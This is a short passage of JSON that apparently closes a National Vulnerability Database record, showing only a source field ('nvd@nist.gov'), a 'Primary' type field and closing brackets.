        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}